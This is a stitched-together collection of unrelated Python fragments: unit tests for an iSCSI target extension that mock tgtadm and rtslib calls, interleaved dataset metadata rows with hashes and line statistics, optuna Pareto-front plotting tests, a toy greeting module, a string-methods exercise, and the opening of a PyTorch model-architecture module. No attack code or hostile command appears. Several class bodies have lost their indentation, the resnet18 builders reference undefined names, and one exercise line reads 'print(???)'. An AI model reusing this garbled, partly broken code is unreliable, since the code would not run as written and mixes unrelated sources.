                              'logicalunit', '--op', 'new', '--tid', '1',
                              '--lun', '1', '--backing-store', self.fake_dev),
                    mock.call('tgtadm', '--lld', 'iscsi', '--mode', 'target',
                              '--op', 'bind', '--tid', '1',
                              '--initiator-address', 'ALL')]
        mock_execute.assert_has_calls(expected)
        mock_dispatch.assert_called_once_with('get_os_install_device')
        self.assertEqual({'iscsi_target_iqn': self.fake_iqn},
                         result.command_result)
        # The disk must not be wiped on the success path.
        self.assertFalse(mock_destroy.called)

    def test_start_iscsi_target_with_special_port(self, mock_execute,
                                                  mock_dispatch,
                                                  mock_destroy):
        # A non-default portal_port adds an extra 'portal new' tgtadm call.
        mock_dispatch.return_value = self.fake_dev
        mock_execute.return_value = ('', '')
        result = self.agent_extension.start_iscsi_target(iqn=self.fake_iqn,
                                                         portal_port=3268)
        expected = [mock.call('tgtd'),
                    mock.call('tgtadm', '--lld', 'iscsi', '--mode',
                              'target', '--op', 'show', attempts=10),
                    mock.call('tgtadm', '--lld', 'iscsi', '--mode',
                              'portal', '--op', 'new', '--param',
                              'portal=0.0.0.0:3268'),
                    mock.call('tgtadm', '--lld', 'iscsi', '--mode',
                              'target', '--op', 'new', '--tid', '1',
                              '--targetname', self.fake_iqn),
                    mock.call('tgtadm', '--lld', 'iscsi', '--mode',
                              'logicalunit', '--op', 'new', '--tid', '1',
                              '--lun', '1', '--backing-store', self.fake_dev),
                    mock.call('tgtadm', '--lld', 'iscsi', '--mode', 'target',
                              '--op', 'bind', '--tid', '1',
                              '--initiator-address', 'ALL')]
        mock_execute.assert_has_calls(expected)
        mock_dispatch.assert_called_once_with('get_os_install_device')
        self.assertEqual({'iscsi_target_iqn': self.fake_iqn},
                         result.command_result)

    def test_start_iscsi_target_fail_wait_daemon(self, mock_execute,
                                                 mock_dispatch,
                                                 mock_destroy):
        mock_dispatch.return_value = self.fake_dev
        # side effects here:
        # - execute tgtd: stdout=='', stderr==''
        # - induce tgtadm failure while in _wait_for_scsi_daemon
        mock_execute.side_effect = [('', ''),
                                    processutils.ProcessExecutionError('blah')]
        self.assertRaises(errors.ISCSIError,
                          self.agent_extension.start_iscsi_target,
                          iqn=self.fake_iqn)
        # Only the daemon start and the failed poll may have run.
        expected = [mock.call('tgtd'),
                    mock.call('tgtadm', '--lld', 'iscsi', '--mode', 'target',
                              '--op', 'show', attempts=10)]
        mock_execute.assert_has_calls(expected)
        mock_dispatch.assert_called_once_with('get_os_install_device')
        self.assertFalse(mock_destroy.called)

    @mock.patch.object(iscsi, '_wait_for_tgtd', autospec=True)
    def test_start_iscsi_target_fail_command(self, mock_wait_iscsi,
                                             mock_execute, mock_dispatch,
                                             mock_destroy):
        # Daemon start and wait succeed; the 'target new' command fails,
        # which must surface as an ISCSIError.
        mock_dispatch.return_value = self.fake_dev
        mock_execute.side_effect = [('', ''), ('', ''),
                                    processutils.ProcessExecutionError('blah')]
        self.assertRaises(errors.ISCSIError,
                          self.agent_extension.start_iscsi_target,
                          iqn=self.fake_iqn)
        expected = [mock.call('tgtd'),
                    mock.call('tgtadm', '--lld', 'iscsi', '--mode',
                              'target', '--op', 'new', '--tid', '1',
                              '--targetname', self.fake_iqn)]
        mock_execute.assert_has_calls(expected)
        mock_dispatch.assert_called_once_with('get_os_install_device')

    def test_start_iscsi_target_fail_command_not_exist(self, mock_execute,
                                                       mock_dispatch,
                                                       mock_destroy):
        # A missing tgt binary (OSError) must also map to ISCSIError.
        mock_dispatch.return_value = self.fake_dev
        mock_execute.side_effect = OSError('file not found')
        self.assertRaises(errors.ISCSIError,
                          self.agent_extension.start_iscsi_target,
                          iqn=self.fake_iqn)
# Keep a handle on the real rtslib_fb.utils module (it defines the
# RTSLibError exception used below) before later tests mock out
# iscsi.rtslib_fb wholesale.
_ORIG_UTILS = iscsi.rtslib_fb.utils
@mock.patch.object(disk_utils, 'destroy_disk_metadata', autospec=True)
@mock.patch.object(hardware, 'dispatch_to_managers', autospec=True)
# Don't mock the utils module, as it contains exceptions
@mock.patch.object(iscsi, 'rtslib_fb', utils=_ORIG_UTILS, autospec=True)
class TestISCSIExtensionLIO(base.IronicAgentTest):
def setUp(self):
super(TestISCSIExtensionLIO, self).setUp()
self.agent_extension = iscsi.ISCSIExtension(FakeAgent())
self.fake_dev = '/dev/fake'
self.fake_iqn = 'iqn-fake'
@mock.patch('ironic_python_agent.netutils.get_wildcard_address',
autospec=True)
def test_start_iscsi_target(self, mock_get_wildcard_address,
mock_rtslib, mock_dispatch,
mock_destroy):
mock_get_wildcard_address.return_value = '::'
mock_dispatch.return_value = self.fake_dev
result = self.agent_extension.start_iscsi_target(iqn=self.fake_iqn)
self.assertEqual({'iscsi_target_iqn': self.fake_iqn},
result.command_result)
mock_rtslib.BlockStorageObject.assert_called_once_with(
name=self.fake_iqn, dev=self.fake_dev)
mock_rtslib.Target.assert_called_once_with(mock.ANY, self.fake_iqn,
mode='create')
mock_rtslib.TPG.assert_called_once_with(
mock_rtslib.Target.return_value, mode='create')
mock_rtslib.LUN.assert_called_once_with(
mock_rtslib.TPG.return_value,
storage_object=mock_rtslib.BlockStorageObject.return_value,
lun=1)
mock_rtslib.NetworkPortal.assert_called_once_with(
mock_rtslib.TPG.return_value, '[::]', 3260)
self.assertFalse(mock_destroy.called)
@mock.patch('ironic_python_agent.netutils.get_wildcard_address',
autospec=True)
def test_start_iscsi_target_noipv6(self, mock_get_wildcard_address,
mock_rtslib, mock_dispatch,
mock_destroy):
mock_get_wildcard_address.return_value = '0.0.0.0'
mock_dispatch.return_value = self.fake_dev
result = self.agent_extension.start_iscsi_target(iqn=self.fake_iqn)
self.assertEqual({'iscsi_target_iqn': self.fake_iqn},
result.command_result)
mock_rtslib.BlockStorageObject.assert_called_once_with(
name=self.fake_iqn, dev=self.fake_dev)
mock_rtslib.Target.assert_called_once_with(mock.ANY, self.fake_iqn,
mode='create')
mock_rtslib.TPG.assert_called_once_with(
mock_rtslib.Target.return_value, mode='create')
mock_rtslib.LUN.assert_called_once_with(
mock_rtslib.TPG.return_value,
storage_object=mock_rtslib.BlockStorageObject.return_value,
lun=1)
mock_rtslib.NetworkPortal.assert_called_once_with(
mock_rtslib.TPG.return_value, '0.0.0.0', 3260)
self.assertFalse(mock_destroy.called)
@mock.patch('ironic_python_agent.netutils.get_wildcard_address',
            autospec=True)
def test_start_iscsi_target_with_special_port(self,
                                              mock_get_wildcard_address,
                                              mock_rtslib, mock_dispatch,
                                              mock_destroy):
    """A custom portal_port is propagated to the NetworkPortal."""
    mock_get_wildcard_address.return_value = '::'
    mock_dispatch.return_value = self.fake_dev
    result = self.agent_extension.start_iscsi_target(iqn=self.fake_iqn,
                                                     portal_port=3266)
    self.assertEqual({'iscsi_target_iqn': self.fake_iqn},
                     result.command_result)
    mock_rtslib.BlockStorageObject.assert_called_once_with(
        name=self.fake_iqn, dev=self.fake_dev)
    mock_rtslib.Target.assert_called_once_with(mock.ANY, self.fake_iqn,
                                               mode='create')
    mock_rtslib.TPG.assert_called_once_with(
        mock_rtslib.Target.return_value, mode='create')
    mock_rtslib.LUN.assert_called_once_with(
        mock_rtslib.TPG.return_value,
        storage_object=mock_rtslib.BlockStorageObject.return_value,
        lun=1)
    # The custom port must be used instead of the default 3260.
    mock_rtslib.NetworkPortal.assert_called_once_with(
        mock_rtslib.TPG.return_value, '[::]', 3266)
    # Added for consistency with the sibling success tests: success must
    # never trigger a disk-metadata wipe.
    self.assertFalse(mock_destroy.called)
def test_failed_to_start_iscsi(self, mock_rtslib, mock_dispatch,
                               mock_destroy):
    """An RTSLibError while creating the target surfaces as ISCSIError."""
    mock_dispatch.return_value = self.fake_dev
    mock_rtslib.Target.side_effect = _ORIG_UTILS.RTSLibError()
    self.assertRaisesRegex(
        errors.ISCSIError, 'Failed to create a target',
        self.agent_extension.start_iscsi_target, iqn=self.fake_iqn)
@mock.patch('ironic_python_agent.netutils.get_wildcard_address',
            autospec=True)
def test_failed_to_bind_iscsi(self, mock_get_wildcard_address,
                              mock_rtslib, mock_dispatch, mock_destroy):
    """An RTSLibError while binding the portal surfaces as ISCSIError."""
    mock_get_wildcard_address.return_value = '::'
    mock_dispatch.return_value = self.fake_dev
    mock_rtslib.NetworkPortal.side_effect = _ORIG_UTILS.RTSLibError()
    # portal_port=None must fall back to the default port 3260.
    self.assertRaisesRegex(
        errors.ISCSIError, 'Failed to publish a target',
        self.agent_extension.start_iscsi_target, iqn=self.fake_iqn,
        portal_port=None)
    mock_rtslib.BlockStorageObject.assert_called_once_with(
        name=self.fake_iqn, dev=self.fake_dev)
    mock_rtslib.Target.assert_called_once_with(mock.ANY, self.fake_iqn,
                                               mode='create')
    mock_rtslib.TPG.assert_called_once_with(
        mock_rtslib.Target.return_value, mode='create')
    mock_rtslib.LUN.assert_called_once_with(
        mock_rtslib.TPG.return_value,
        storage_object=mock_rtslib.BlockStorageObject.return_value,
        lun=1)
    mock_rtslib.NetworkPortal.assert_called_once_with(
        mock_rtslib.TPG.return_value, '[::]', 3260)
    # Bind failures must not wipe disk metadata.
    self.assertFalse(mock_destroy.called)
def test_failed_to_start_iscsi_wipe_disk_metadata(self, mock_rtslib,
                                                  mock_dispatch,
                                                  mock_destroy):
    """With wipe_disk_metadata=True a failure wipes the disk metadata."""
    mock_dispatch.return_value = self.fake_dev
    mock_rtslib.Target.side_effect = _ORIG_UTILS.RTSLibError()
    self.assertRaisesRegex(
        errors.ISCSIError, 'Failed to create a target',
        self.agent_extension.start_iscsi_target,
        iqn=self.fake_iqn,
        wipe_disk_metadata=True)
    # The wipe must target the dispatched device and the node's uuid.
    mock_destroy.assert_called_once_with('/dev/fake', 'my_node_uuid')
@mock.patch.object(iscsi.rtslib_fb, 'RTSRoot', autospec=True)
@mock.patch.object(utils, 'execute', autospec=True)
class TestISCSIExtensionCleanUpFallback(base.IronicAgentTest):
    """clean_up() falls back to tgtadm when rtslib (LIO) is unavailable."""

    def setUp(self):
        super(TestISCSIExtensionCleanUpFallback, self).setUp()
        self.agent_extension = iscsi.ISCSIExtension()
        self.fake_dev = '/dev/fake'
        self.fake_iqn = 'iqn-fake'

    def test_lio_not_available(self, mock_execute, mock_rtslib):
        """RTSRoot raising EnvironmentError triggers the tgtadm teardown."""
        mock_execute.return_value = ('', '')
        mock_rtslib.side_effect = EnvironmentError()
        # Expected teardown sequence: unbind initiators, sync, delete target.
        expected = [mock.call('tgtadm', '--lld', 'iscsi', '--mode',
                              'target', '--op', 'unbind', '--tid', '1',
                              '--initiator-address', 'ALL'),
                    mock.call('sync'),
                    mock.call('tgtadm', '--lld', 'iscsi', '--mode', 'target',
                              '--op', 'delete', '--tid', '1')]
        iscsi.clean_up(self.fake_dev)
        mock_execute.assert_has_calls(expected)

    def test_commands_fail(self, mock_execute, mock_rtslib):
        """Failing tgtadm commands do not abort the teardown sequence."""
        mock_execute.side_effect = [processutils.ProcessExecutionError(),
                                    ('', ''),
                                    processutils.ProcessExecutionError()]
        mock_rtslib.side_effect = EnvironmentError()
        # All three commands are still attempted despite the failures.
        expected = [mock.call('tgtadm', '--lld', 'iscsi', '--mode',
                              'target', '--op', 'unbind', '--tid', '1',
                              '--initiator-address', 'ALL'),
                    mock.call('sync'),
                    mock.call('tgtadm', '--lld', 'iscsi', '--mode', 'target',
                              '--op', 'delete', '--tid', '1')]
        iscsi.clean_up(self.fake_dev)
        mock_execute.assert_has_calls(expected)
@mock.patch.object(iscsi.rtslib_fb, 'RTSRoot', autospec=True)
class TestISCSIExtensionCleanUp(base.IronicAgentTest):
    """clean_up() via rtslib deletes only the objects backing the device."""

    def setUp(self):
        super(TestISCSIExtensionCleanUp, self).setUp()
        self.agent_extension = iscsi.ISCSIExtension()
        self.fake_dev = '/dev/fake'
        self.fake_iqn = 'iqn-fake'

    def test_device_not_found(self, mock_rtslib):
        """No storage objects: clean_up is a no-op and must not raise."""
        mock_rtslib.return_value.storage_objects = []
        iscsi.clean_up(self.fake_dev)

    def test_ok(self, mock_rtslib):
        """Only the storage object and target backing the device are deleted."""
        mock_rtslib.return_value.storage_objects = [
            mock.Mock(udev_path='wrong path'),
            mock.Mock(udev_path=self.fake_dev),
            mock.Mock(udev_path='wrong path'),
        ]
        # mocks don't play well with name attribute
        for i, fake_storage in enumerate(
                mock_rtslib.return_value.storage_objects):
            fake_storage.name = 'iqn%d' % i

        mock_rtslib.return_value.targets = [
            mock.Mock(wwn='iqn0'),
            mock.Mock(wwn='iqn1'),
        ]

        iscsi.clean_up(self.fake_dev)

        # Exactly the storage object whose udev_path matches is deleted...
        for fake_storage in mock_rtslib.return_value.storage_objects:
            self.assertEqual(fake_storage.udev_path == self.fake_dev,
                             fake_storage.delete.called)
        # ...and only the target whose wwn matches that object's name.
        for fake_target in mock_rtslib.return_value.targets:
            self.assertEqual(fake_target.wwn == 'iqn1',
                             fake_target.delete.called)

    def test_delete_fails(self, mock_rtslib):
        """An RTSLibError from target deletion surfaces as ISCSIError."""
        mock_rtslib.return_value.storage_objects = [
            mock.Mock(udev_path='wrong path'),
            mock.Mock(udev_path=self.fake_dev),
            mock.Mock(udev_path='wrong path'),
        ]
        # mocks don't play well with name attribute
        for i, fake_storage in enumerate(
                mock_rtslib.return_value.storage_objects):
            fake_storage.name = 'iqn%d' % i

        mock_rtslib.return_value.targets = [
            mock.Mock(wwn='iqn0'),
            mock.Mock(wwn='iqn1'),
        ]
        mock_rtslib.return_value.targets[1].delete.side_effect = (
            _ORIG_UTILS.RTSLibError())

        self.assertRaises(errors.ISCSIError, iscsi.clean_up, self.fake_dev)
| 47.238961
| 79
| 0.585583
| 1,954
| 18,187
| 5.145855
| 0.120266
| 0.061661
| 0.033913
| 0.049727
| 0.831726
| 0.815813
| 0.763998
| 0.736251
| 0.736251
| 0.713277
| 0
| 0.006178
| 0.305768
| 18,187
| 384
| 80
| 47.361979
| 0.790195
| 0.046792
| 0
| 0.734824
| 0
| 0
| 0.097199
| 0.018597
| 0
| 0
| 0
| 0
| 0.166134
| 1
| 0.067093
| false
| 0
| 0.025559
| 0.003195
| 0.115016
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
134aa0e62634bd41e5d505092cdb41995b50e17e
| 8,253
|
py
|
Python
|
tests/visualization_tests/matplotlib_tests/test_pareto_front.py
|
agarwalrounak/optuna
|
b5fd0439dc33c94c06251974b8cb023a3f9bccc7
|
[
"MIT"
] | 2
|
2020-09-21T21:55:46.000Z
|
2021-04-11T09:56:55.000Z
|
tests/visualization_tests/matplotlib_tests/test_pareto_front.py
|
SCUTJcfeng/optuna
|
9331374a2460da067a6922e4ea09dd4706f3d950
|
[
"MIT"
] | 5
|
2021-05-23T08:39:21.000Z
|
2021-05-23T09:34:55.000Z
|
tests/visualization_tests/matplotlib_tests/test_pareto_front.py
|
SCUTJcfeng/optuna
|
9331374a2460da067a6922e4ea09dd4706f3d950
|
[
"MIT"
] | null | null | null |
import itertools
from typing import List
from typing import Optional
import numpy as np
import pytest
import optuna
from optuna.visualization.matplotlib import plot_pareto_front
@pytest.mark.filterwarnings("ignore::optuna.exceptions.ExperimentalWarning")
@pytest.mark.parametrize("include_dominated_trials", [False, True])
@pytest.mark.parametrize("axis_order", [None, [0, 1], [1, 0]])
def test_plot_pareto_front_2d(
    include_dominated_trials: bool, axis_order: Optional[List[int]]
) -> None:
    """2-objective Pareto-front plot: empty study, data, target_names."""
    # Test with no trial.
    study = optuna.create_study(directions=["minimize", "minimize"])
    figure = plot_pareto_front(
        study=study,
        include_dominated_trials=include_dominated_trials,
        axis_order=axis_order,
    )
    assert not figure.has_data()

    # Test with three trials.
    study.enqueue_trial({"x": 1, "y": 1})
    study.enqueue_trial({"x": 1, "y": 0})
    study.enqueue_trial({"x": 0, "y": 1})
    study.optimize(lambda t: [t.suggest_int("x", 0, 1), t.suggest_int("y", 0, 1)], n_trials=3)

    figure = plot_pareto_front(
        study=study,
        include_dominated_trials=include_dominated_trials,
        axis_order=axis_order,
    )
    assert figure.has_data()

    # Test with `target_names` argument: its length must equal n_objectives.
    with pytest.raises(ValueError):
        plot_pareto_front(
            study=study, target_names=[], include_dominated_trials=include_dominated_trials
        )
    with pytest.raises(ValueError):
        plot_pareto_front(
            study=study, target_names=["Foo"], include_dominated_trials=include_dominated_trials
        )
    with pytest.raises(ValueError):
        plot_pareto_front(
            study=study,
            target_names=["Foo", "Bar", "Baz"],
            include_dominated_trials=include_dominated_trials,
            axis_order=axis_order,
        )

    target_names = ["Foo", "Bar"]
    figure = plot_pareto_front(
        study=study,
        target_names=target_names,
        include_dominated_trials=include_dominated_trials,
        axis_order=axis_order,
    )
    assert figure.has_data()
    # Axis labels must follow axis_order when one is given.
    if axis_order is None:
        assert figure.get_xlabel() == target_names[0]
        assert figure.get_ylabel() == target_names[1]
    else:
        assert figure.get_xlabel() == target_names[axis_order[0]]
        assert figure.get_ylabel() == target_names[axis_order[1]]
@pytest.mark.filterwarnings("ignore::optuna.exceptions.ExperimentalWarning")
@pytest.mark.parametrize("include_dominated_trials", [False, True])
@pytest.mark.parametrize(
    "axis_order", [None] + list(itertools.permutations(range(3), 3))  # type: ignore
)
def test_plot_pareto_front_3d(
    include_dominated_trials: bool, axis_order: Optional[List[int]]
) -> None:
    """3-objective Pareto-front plot: empty study, data, target_names."""
    # Test with no trial.
    study = optuna.create_study(directions=["minimize", "minimize", "minimize"])
    figure = plot_pareto_front(
        study=study,
        include_dominated_trials=include_dominated_trials,
        axis_order=axis_order,
    )
    assert not figure.has_data()

    # Test with three trials.
    study.enqueue_trial({"x": 1, "y": 1, "z": 1})
    study.enqueue_trial({"x": 1, "y": 0, "z": 1})
    study.enqueue_trial({"x": 1, "y": 1, "z": 0})
    study.optimize(
        lambda t: [t.suggest_int("x", 0, 1), t.suggest_int("y", 0, 1), t.suggest_int("z", 0, 1)],
        n_trials=3,
    )

    figure = plot_pareto_front(
        study=study,
        include_dominated_trials=include_dominated_trials,
        axis_order=axis_order,
    )
    assert figure.has_data()

    # Test with `target_names` argument: its length must equal n_objectives.
    with pytest.raises(ValueError):
        plot_pareto_front(
            study=study,
            target_names=[],
            include_dominated_trials=include_dominated_trials,
            axis_order=axis_order,
        )
    with pytest.raises(ValueError):
        plot_pareto_front(
            study=study,
            target_names=["Foo"],
            include_dominated_trials=include_dominated_trials,
            axis_order=axis_order,
        )
    with pytest.raises(ValueError):
        plot_pareto_front(
            study=study,
            target_names=["Foo", "Bar"],
            include_dominated_trials=include_dominated_trials,
            axis_order=axis_order,
        )
    with pytest.raises(ValueError):
        plot_pareto_front(
            study=study,
            target_names=["Foo", "Bar", "Baz", "Qux"],
            include_dominated_trials=include_dominated_trials,
            axis_order=axis_order,
        )

    target_names = ["Foo", "Bar", "Baz"]
    # Fix: also pass include_dominated_trials here, mirroring the 2-d test --
    # the parameter was dropped from this call, so the parametrized value
    # was never exercised on the labeled figure.
    figure = plot_pareto_front(
        study=study,
        target_names=target_names,
        include_dominated_trials=include_dominated_trials,
        axis_order=axis_order,
    )
    assert figure.has_data()
    if axis_order is None:
        assert figure.get_xlabel() == target_names[0]
        assert figure.get_ylabel() == target_names[1]
        assert figure.get_zlabel() == target_names[2]
    else:
        assert figure.get_xlabel() == target_names[axis_order[0]]
        assert figure.get_ylabel() == target_names[axis_order[1]]
        assert figure.get_zlabel() == target_names[axis_order[2]]
@pytest.mark.filterwarnings("ignore::optuna.exceptions.ExperimentalWarning")
@pytest.mark.parametrize("include_dominated_trials", [False, True])
def test_plot_pareto_front_unsupported_dimensions(include_dominated_trials: bool) -> None:
    """Only 2 or 3 objectives are plottable; other counts raise ValueError."""
    # Unsupported: n_objectives == 1.
    with pytest.raises(ValueError):
        study = optuna.create_study(directions=["minimize"])
        study.optimize(lambda t: [0], n_trials=1)
        plot_pareto_front(study=study, include_dominated_trials=include_dominated_trials)

    # Same, but with a study created via the singular ``direction`` argument.
    with pytest.raises(ValueError):
        study = optuna.create_study(direction="minimize")
        study.optimize(lambda t: [0], n_trials=1)
        plot_pareto_front(study=study, include_dominated_trials=include_dominated_trials)

    # Unsupported: n_objectives == 4.
    with pytest.raises(ValueError):
        study = optuna.create_study(directions=["minimize", "minimize", "minimize", "minimize"])
        study.optimize(lambda t: [0, 0, 0, 0], n_trials=1)
        plot_pareto_front(study=study, include_dominated_trials=include_dominated_trials)
@pytest.mark.filterwarnings("ignore::optuna.exceptions.ExperimentalWarning")
@pytest.mark.parametrize("dimension", [2, 3])
@pytest.mark.parametrize("include_dominated_trials", [False, True])
def test_plot_pareto_front_invalid_axis_order(
    dimension: int, include_dominated_trials: bool
) -> None:
    """Every malformed axis_order (length, dupes, range) raises ValueError."""
    study = optuna.create_study(directions=["minimize"] * dimension)
    study.optimize(lambda t: [0] * dimension, n_trials=1)

    # Invalid: len(axis_order) != dimension
    with pytest.raises(ValueError):
        invalid_axis_order = list(range(dimension + 1))
        assert len(invalid_axis_order) != dimension
        plot_pareto_front(
            study=study,
            include_dominated_trials=include_dominated_trials,
            axis_order=invalid_axis_order,
        )

    # Invalid: np.unique(axis_order).size != dimension (duplicate entries)
    with pytest.raises(ValueError):
        invalid_axis_order = list(range(dimension))
        invalid_axis_order[1] = invalid_axis_order[0]
        assert np.unique(invalid_axis_order).size != dimension
        plot_pareto_front(
            study=study,
            include_dominated_trials=include_dominated_trials,
            axis_order=invalid_axis_order,
        )

    # Invalid: max(axis_order) > (dimension - 1)
    with pytest.raises(ValueError):
        invalid_axis_order = list(range(dimension))
        invalid_axis_order[-1] += 1
        assert max(invalid_axis_order) > (dimension - 1)
        plot_pareto_front(
            study=study,
            include_dominated_trials=include_dominated_trials,
            axis_order=invalid_axis_order,
        )

    # Invalid: min(axis_order) < 0
    with pytest.raises(ValueError):
        study = optuna.create_study(directions=["minimize", "minimize"])
        study.optimize(lambda t: [0] * 2, n_trials=1)
        invalid_axis_order = list(range(dimension))
        invalid_axis_order[0] -= 1
        assert min(invalid_axis_order) < 0
        plot_pareto_front(
            study=study,
            include_dominated_trials=include_dominated_trials,
            axis_order=invalid_axis_order,
        )
| 35.573276
| 97
| 0.668605
| 989
| 8,253
| 5.282103
| 0.094034
| 0.099923
| 0.193721
| 0.07657
| 0.88438
| 0.857389
| 0.849732
| 0.82791
| 0.80915
| 0.799579
| 0
| 0.011464
| 0.21786
| 8,253
| 231
| 98
| 35.727273
| 0.797831
| 0.047619
| 0
| 0.607527
| 0
| 0
| 0.061815
| 0.035177
| 0
| 0
| 0
| 0
| 0.107527
| 1
| 0.021505
| false
| 0
| 0.037634
| 0
| 0.05914
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
134f60fb7797c96f9718860d1a3bdcd352cb0343
| 97
|
py
|
Python
|
tests/Modules/dir_module/sub_module/sub_module_functions.py
|
shoriwe/PyMemoryImport
|
abd41e2bd840585a1223b61d8111d65ee46c6e47
|
[
"MIT"
] | null | null | null |
tests/Modules/dir_module/sub_module/sub_module_functions.py
|
shoriwe/PyMemoryImport
|
abd41e2bd840585a1223b61d8111d65ee46c6e47
|
[
"MIT"
] | null | null | null |
tests/Modules/dir_module/sub_module/sub_module_functions.py
|
shoriwe/PyMemoryImport
|
abd41e2bd840585a1223b61d8111d65ee46c6e47
|
[
"MIT"
] | null | null | null |
def hello_from_sub_module_functions():
    """Print a greeting identifying this sub-module."""
    greeting = "Hello!!! From sub_module.sub_module_functions"
    print(greeting)
| 48.5
| 58
| 0.804124
| 14
| 97
| 5.071429
| 0.5
| 0.380282
| 0.338028
| 0.507042
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082474
| 97
| 2
| 58
| 48.5
| 0.797753
| 0
| 0
| 0
| 0
| 0
| 0.459184
| 0.316327
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
135735366896684c5cf45e6004f77c2304bf7a47
| 136
|
py
|
Python
|
Strings/Basic string methods/string_methods.py
|
fsierra2000/Python
|
19c3f52797b366019794ea75508d7317ef492ed5
|
[
"MIT"
] | null | null | null |
Strings/Basic string methods/string_methods.py
|
fsierra2000/Python
|
19c3f52797b366019794ea75508d7317ef492ed5
|
[
"MIT"
] | null | null | null |
Strings/Basic string methods/string_methods.py
|
fsierra2000/Python
|
19c3f52797b366019794ea75508d7317ef492ed5
|
[
"MIT"
] | null | null | null |
# Basic string methods demo.
monty_python = "Monty Python"
print(monty_python)
print(monty_python.lower())  # Print lower-cased version of the string
# Fix: the original line was the unfinished placeholder ``print(???)``,
# which is a syntax error.  Complete the exercise with the upper-cased form.
print(monty_python.upper())  # Print upper-cased version of the string
| 19.428571
| 72
| 0.735294
| 19
| 136
| 5.105263
| 0.473684
| 0.453608
| 0.329897
| 0.43299
| 0.443299
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.139706
| 136
| 6
| 73
| 22.666667
| 0.82906
| 0.286765
| 0
| 0
| 0
| 0
| 0.126316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.75
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
136fb3fdf1b1a862c5676bccfbac532b7cfe86e4
| 29,985
|
py
|
Python
|
lib/architectures.py
|
osimeoni/RethinkingDeepActiveLearning
|
8a0056f47605276b1c9d8338d423433dae73f5e9
|
[
"MIT"
] | 4
|
2021-03-01T17:43:48.000Z
|
2022-03-24T11:28:48.000Z
|
lib/architectures.py
|
osimeoni/RethinkingDeepActiveLearning
|
8a0056f47605276b1c9d8338d423433dae73f5e9
|
[
"MIT"
] | null | null | null |
lib/architectures.py
|
osimeoni/RethinkingDeepActiveLearning
|
8a0056f47605276b1c9d8338d423433dae73f5e9
|
[
"MIT"
] | null | null | null |
import sys
import math
import itertools
import torch
from torch import nn
from torch.nn import functional as F
from torch.autograd import Variable, Function
from .utils import export, parameter_count
import pdb
@export
def cifar_cnn_single(pretrained=False, **kwargs):
    """Build the single-head CIFAR CNN; pretrained weights are unsupported."""
    assert not pretrained
    return CNNSingle(**kwargs)
@export
def cifar_cnn_gauss_single(pretrained=False, **kwargs):
    """Build the single-head noisy CIFAR CNN; pretrained is unsupported."""
    assert not pretrained
    return CNNGaussSingle(**kwargs)
@export
def cifar_cnn(pretrained=False, **kwargs):
    """Build the two-head CIFAR CNN; pretrained weights are unsupported."""
    assert not pretrained
    return CNN(**kwargs)
@export
def cifar_cnn_gauss(pretrained=False, **kwargs):
    """Build the noisy two-head CIFAR CNN; pretrained is unsupported."""
    assert not pretrained
    return CNNGauss(**kwargs)
# This name is exported to command line arguments
@export
def cifar_shakeshake26(pretrained=False, **kwargs):
    """Build the 26-layer 2x96d Shake-Shake ResNet (Shake-Even-Image, groups=1)
    for CIFAR-sized inputs; pretrained weights are unsupported."""
    assert not pretrained
    return ResNet32x32(ShakeShakeBlock,
                       layers=[4, 4, 4],
                       channels=96,
                       downsample='shift_conv',
                       **kwargs)
# This one is for imagenet
# This name is exported to command line arguments
@export
def resnext152(pretrained=False, **kwargs):
    """Build a ResNeXt-152 (32x4d) for 224x224 ImageNet inputs."""
    assert not pretrained
    return ResNet224x224(BottleneckBlock,
                         layers=[3, 8, 36, 3],
                         channels=32 * 4,
                         groups=32,
                         downsample='basic',
                         **kwargs)
@export
def resnet18(pretrained=False, **kwargs):
    """Constructs a ResNet-18 model.

    Args:
        pretrained (bool): If True, returns a model pre-trained on ImageNet
    """
    model = ResNet(BasicBlock, [2, 2, 2, 2], **kwargs)
    if pretrained:
        # Bug fix: the original referenced ``model_zoo`` and ``model_urls``,
        # neither of which is imported or defined in this module, so
        # pretrained=True always raised NameError.  Load the canonical
        # torchvision ResNet-18 checkpoint directly instead.
        from torch.hub import load_state_dict_from_url
        state_dict = load_state_dict_from_url(
            'https://download.pytorch.org/models/resnet18-5c106cde.pth')
        model.load_state_dict(state_dict)
    return model
@export
def resnet18_double(pretrained=False, **kwargs):
    """Constructs a ResNet-18 model.

    Args:
        pretrained (bool): If True, returns a model pre-trained on ImageNet
    """
    model = ResNetDouble(BasicBlock, [2, 2, 2, 2], **kwargs)
    if pretrained:
        # Bug fix: ``model_zoo``/``model_urls`` were never imported/defined
        # in this module, so pretrained=True always raised NameError.
        # NOTE(review): whether the single-trunk resnet18 checkpoint matches
        # ResNetDouble's parameter names needs verification against that class.
        from torch.hub import load_state_dict_from_url
        state_dict = load_state_dict_from_url(
            'https://download.pytorch.org/models/resnet18-5c106cde.pth')
        model.load_state_dict(state_dict)
    return model
class ResNet224x224(nn.Module):
    """ResNet/ResNeXt backbone for 224x224 inputs with two FC heads.

    ``forward`` returns a pair ``(fc1(x), fc2(x))`` of logits.
